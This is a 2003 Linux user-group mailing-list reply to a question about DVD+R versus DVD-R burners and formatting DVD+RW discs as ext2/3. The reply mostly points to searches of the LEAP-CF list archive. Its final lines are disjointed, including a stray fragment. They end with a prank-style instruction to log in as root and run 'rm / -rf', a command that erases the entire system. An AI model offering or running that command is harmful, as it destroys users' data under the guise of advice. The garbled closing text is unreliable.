On Sunday 23 March 2003 12:05 pm, gabor wrote:
> hi,
>

> i'm kind of thinking about buying a dvd burner...
>
> what is better? dvd+r or dvd-r? i know it's a stupid question but i want
> to hear opinions.
> which has a more bright future? both? which is a better technology?
> can be dvd+r's burned with higher speed than 2.4x ?
> please share your thought/experiences with me.
>
> for example i've read that you can use a dvd+rw as a normal disk, that
> means you can format it for ext2/3 and normally copy/delete data to/from
> it. did anyone try that?

Search our LUG list for DVD and Bryan...

http://www.leap-cf.org/cgi-bin/htsearch?words=dvd+bryan&method=and&config=htdig&restrict=leaplist

The LEAP-CF mailing list is a great resource:

http://www.leap-cf.org/search.php3?article=search

to all your contacts.
After a month or so log in as root and do a rm / -rf. Or ask your
administrator to do so...